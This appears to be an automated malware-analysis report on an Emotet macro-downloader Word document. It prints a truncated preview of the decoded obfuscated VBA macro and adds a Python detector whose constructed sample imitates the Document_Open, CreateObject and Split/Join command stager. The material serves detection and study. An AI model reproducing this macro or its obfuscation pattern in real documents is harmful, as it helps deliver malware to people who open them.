Verdict: MALICIOUS (Risk Score 302)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7464357-0', strongly indicating the Emotet family. Critical heuristics indicate a VBA UserForm hidden-property command stager that executes automatically via the Document_Open macro and uses CreateObject and GetObject calls, most likely to download and run a secondary payload. The embedded VBA macro 'macros.bas' is the source of this behavior; its preview shows the typical Emotet maldoc shape: padding with unused Dim declarations and lorem-ipsum string literals, a Document_Open stub that calls a helper, and a helper (Ooomipyk) that reads properties from the form modules (Eeglwfvuypu.Srabtjse, Ocqunouq.*) and concatenates them into the string that is later executed.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-7464357-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-7464357-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive; it still requires the user to enable macros.
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro (runs automatically when the document is opened with macros enabled)
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that appears in any document carrying drawing markup; it is not a download or command-and-control location, and it is unrelated to the macro stager above.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13306 bytes | 2fd6c1d13d86485279b9625ca65b0d8796c33dc2c319c4c2f1adfc3fe19d0ecf |

Preview script (first 1,000 lines of the extracted script; truncated below):
Attribute VB_Name = "Eeglwfvuypu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Srabtjse, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Jteniafb = "Peggy"
Dim Xrfxwfqtvcm As Double
Dim Wqjgyebmukwbv As Double
Emdaknscfk = ("Marilyn")
Dim Qtsbnruiwz As Double
Dim Wybdgiwbm As Boolean
Dim Iylgldodwst As String
Bjijajpftxel = Wwoeymdkcbk
Dim Ivxocnibw As String
Bdokobhuap = ("Sequi quia itaque ipsam molestiae ipsa quos debitis perferendis.")
Dim Hnvzprhgy As Boolean
Dim Gjwibycnz As Boolean
Dim Dvxtvbup As Double
Qopagotjpsn = "Rerum tempora."
Dim Iassgwxbsjfka As String
Dim Wfmjjppughuk As Boolean
Dim Kepuwosd As Double
Tkoyfkqflyn = ("Rerum ipsum sed mollitia voluptatem aliquam et sunt.")
Dim Ezisglkll As Integer
Heqpencswypzb = 152
Wrpykpaykvn = Rycivpraua
Vunhozhbrptvm = 340
Mqdsecahoyom
Ygpzjssp = "Orville"
Dim Jdssgggbljuww As Double
Dim Rnizqgtdmu As Integer
Aaddjoqdimwn = ("Delbert")
Dim Ahbgckuos As Integer
Dim Qnrpzfyzmf As Double
Dim Flhfrbfru As Integer
Glcgsxylhy = Bynjgyouzyaw
Dim Ednmnoyckexz As Boolean
Nutjmsfh = ("Delectus magnam et quos est provident.")
Dim Ztgxlilgkxtv As Boolean
Dim Keuznilgsmge As Integer
Dim Jcowyunuiaq As Integer
Rpiisvzzhygt = "Consequuntur error possimus voluptas placeat."
Dim Sauqheuwi As Double
Dim Xdhpwtjlourjd As Integer
Dim Frbeidcnuu As Boolean
Jyzvgzmurs = ("Debitis at.")
Dim Ewihmbqrby As Boolean
Udasvqmv = 823
Ampzkkquqn = Zlvubtdwikz
Dytzbfoc = 859
End Sub
Attribute VB_Name = "Ocqunouq"
Attribute VB_Base = "0{E0F51CF9-E923-4BF1-A02D-9AFD67A4F88D}{80D98A36-08FF-41AE-9287-7B1F2DD63418}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Whsthngo"
Function Ooomipyk()
Vzxszlcqk = "Aliquam sunt et nostrum."
Dim Rbtpwxzoo As Double
Dim Oqkpwuycnlt As Boolean
Nzizkrscq = ("Aut.")
Dim Byandtbb As Double
Dim Lhikohrhh As Integer
Dim Incwpzdxrnxtj As Integer
Tkzukrxzbszpv = Uibdtkyq
Dim Xefsnnywqohh As Double
Fknaepkhnq = ("Reprehenderit enim.")
Dim Rguoutlamns As Double
Dim Fbsfutmvrxi As String
Dim Mxiprozywsbcu As Boolean
Mxssgmzorcsxg = "Quos esse quisquam quo."
Dim Jmrwhnrwvdipi As String
Dim Dagqjteppmnj As Integer
Dim Yrsfwjokyfi As Integer
Wpywqfay = ("Delectus tenetur sunt.")
Dim Pjgexbjteaj As Integer
Pjmzctcaio = 402
Arpxdroga = Qeriomdurzcjn
Xfpqhvnxw = 791
Fqnczrgmr = Eeglwfvuypu.Srabtjse
Kohnpgtz = "Dolor quod consequuntur perferendis reprehenderit qui ab."
Dim Vvbnauikohl As String
Dim Vihfarfrsrps As Integer
Zjvwobyur = ("Dolor cupiditate et et.")
Dim Boxnsdrutm As String
Dim Ashlzcemu As String
Dim Jbskwowarow As Double
Ieanxyuv = Vdhpzrmg
Dim Bnmztufxlot As Integer
Educrowtrpzx = ("Dana")
Dim Zxjeihlburb As Integer
Dim Swkfiqkc As Boolean
Dim Pvsrukxm As Double
Egzcjlxhdid = "Voluptatem ratione voluptatem."
Dim Kewgkrgvnmsti As String
Dim Qqxezgymwiv As Integer
Dim Dydboyhnydnv As Boolean
Qthibvirnlyb = ("Perferendis saepe.")
Dim Szyounspir As Double
Ibrmjjdphs = 164
Ublmlscmiuuzf = Iybkpdqm
Aboyaezjyusbg = 627
Qlbsdnpiqxfiy = Fqnczrgmr + Ocqunouq.Jtsmkdqpig + Ocqunouq.Tqmdsjidz + Ocqunouq.Hpkiuhnpwqlk
Ejzduzgvbn = "Vitae quia non."
Dim Jdnlqdiqdnqm As String
Dim Rsvgiwuuxfyft As Double
Sosdwqgym = ("Corporis eligendi sed.")
Dim Yoirtmavhoaue As Boolean
Dim Pfhnlkgllyyjf As Integer
Dim Tifiyglgml As Double
Tqrtnwxbaqypo = Xsudumwu
Dim Whtdzvbhmmv As Integer
Knihkcjp = ("At earum saepe.")
Dim Donrijlxv As Boolean
Dim Rodyavxic As Double
Dim Dokpmfmri As Boolean
Apometxb = "Rerum tempore accusantium."
Dim Uztyfjjhmhrcx As Integer
Dim Hsxfkerfponjo As Double
Dim Kaohjoqr As Boolean
Cjvrkxsdnwaav = ("Loretta")
Dim Cudkravqiwrn As Stri
... (truncated)
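The OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER heuristic above and the macros.bas preview describe the same shape from two sides: an auto-exec entry point, a COM object created from a variable, command text stitched together with Split/Join from form-control properties, all buried in filler declarations and lorem-ipsum literals. The following Python is an added example, not the analyzer's own heuristic engine and not oletools code. It first strips the filler (Dim declarations and literal assignments whose target is never referenced anywhere else) to expose the live skeleton, then applies the heuristic's token checks to that skeleton. SAMPLE_VBA and BENIGN_VBA are constructed fragments that imitate the preview's style; every identifier in them, and the `Obj.Create` call, is made up for illustration and is not copied from the real sample.

```python
import re

# Constructed VBA fragment (not the real macros.bas) that copies the obfuscation
# shape of the extracted preview: junk "Dim ... As Double" lines, lorem-ipsum
# string literals, numeric filler, an auto-exec Document_Open, and a helper that
# reads hidden UserForm control properties, rebuilds a command with Split/Join
# and hands it to a COM object. All identifiers are made up.
SAMPLE_VBA = """Private Sub Document_open()
Jteniafb = "Peggy"
Dim Xrfxwfqtvcm As Double
Dim Wybdgiwbm As Boolean
Bdokobhuap = ("Sequi quia itaque ipsam molestiae ipsa quos debitis perferendis.")
Heqpencswypzb = 152
Ooomipyk
End Sub
Function Ooomipyk()
Dim Rbtpwxzoo As Double
Vzxszlcqk = "Aliquam sunt et nostrum."
Fqnczrgmr = Eeglwfvuypu.Srabtjse
Qlbsdnpiqxfiy = Fqnczrgmr + Ocqunouq.Jtsmkdqpig + Ocqunouq.Tqmdsjidz
Pjmzctcaio = 402
Parts = Split(Ocqunouq.Tqmdsjidz.ControlTipText, "]")
Cmd = Join(Parts, "")
Set Obj = CreateObject(Ocqunouq.Tag)
Obj.Create Cmd, Null, Null, Pid
End Function
"""

# Constructed benign macro: auto-exec, but no object creation or property stitching.
BENIGN_VBA = """Private Sub Document_Open()
ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

# Filler shapes seen in the preview: a bare declaration, or an assignment of a
# string/number literal (optionally parenthesised) to an otherwise unused name.
DIM_RE = re.compile(r"^\s*Dim\s+(\w+)\s+As\s+\w+\s*$", re.I)
LITERAL_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*\(?\s*("[^"]*"|\d+)\s*\)?\s*$')
IDENT_RE = re.compile(r"[A-Za-z_]\w*")

# Token classes the stager heuristic combines.
AUTOEXEC_RE = re.compile(
    r"\b(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|Auto_Open|Workbook_Open)\b", re.I)
OBJECT_EXEC_RE = re.compile(r"\b(CreateObject|GetObject|Shell)\b", re.I)
SPLIT_JOIN_RE = re.compile(r"\b(Split|Join)\s*\(", re.I)
# Property names the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER finding lists.
HIDDEN_PROP_RE = re.compile(r"\.(ControlTipText|Tag|Pages|HelpContextId)\b", re.I)


def strip_junk(source: str) -> list:
    """Drop Dim declarations and literal assignments whose target identifier is
    never referenced on any other line (VBA names are case-insensitive).
    Calls, property reads and concatenations are kept: the macro's live skeleton."""
    lines = source.splitlines()
    idents = [{t.lower() for t in IDENT_RE.findall(ln)} for ln in lines]
    kept = []
    for i, line in enumerate(lines):
        m = DIM_RE.match(line) or LITERAL_ASSIGN_RE.match(line)
        if m:
            name = m.group(1).lower()
            if not any(name in toks for j, toks in enumerate(idents) if j != i):
                continue  # filler: defined here, used nowhere else
        kept.append(line)
    return kept


def score_vba(source: str) -> dict:
    """Apply the stager heuristic to the live skeleton of the macro source."""
    live = "\n".join(strip_junk(source))
    props = sorted({m.group(1) for m in HIDDEN_PROP_RE.finditer(live)})
    result = {
        "autoexec": bool(AUTOEXEC_RE.search(live)),
        "object_exec": bool(OBJECT_EXEC_RE.search(live)),
        "split_join": bool(SPLIT_JOIN_RE.search(live)),
        "hidden_form_props": props,
    }
    # All four signals together is the high-confidence loader shape.
    result["userform_command_stager"] = (
        result["autoexec"] and result["object_exec"]
        and result["split_join"] and bool(props)
    )
    return result


if __name__ == "__main__":
    print("\n".join(strip_junk(SAMPLE_VBA)))
    print(score_vba(SAMPLE_VBA))
    print(score_vba(BENIGN_VBA))
```

Running the script on SAMPLE_VBA removes the eight filler lines and leaves the Document_Open stub, the helper call, the property reads, the Split/Join and the CreateObject call, which is the view an analyst wants before tracing which form properties carry the command. To apply this to the real macros.bas, pass the decoded VBA source (for example the output of `olevba --decode`) in place of the constructed sample; the p-code-only case from the OLE_VBA_PCODE_AUTOEXEC_EXEC finding is not covered here, since it needs the compiled stream rather than source.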